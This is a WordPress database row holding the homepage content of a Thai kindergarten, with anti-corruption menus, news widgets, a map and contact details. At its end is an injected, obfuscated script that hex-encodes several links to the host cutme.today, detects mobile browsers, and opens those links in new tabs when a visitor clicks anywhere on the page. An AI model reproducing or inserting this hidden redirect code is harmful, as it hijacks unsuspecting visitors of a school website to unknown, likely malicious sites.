style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"-20\",\"bottom\":\"-40\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:56:05','2024-07-29 11:56:05','',19,'http://watprato.ssk.in.th/?p=134',0,'revision','',0),
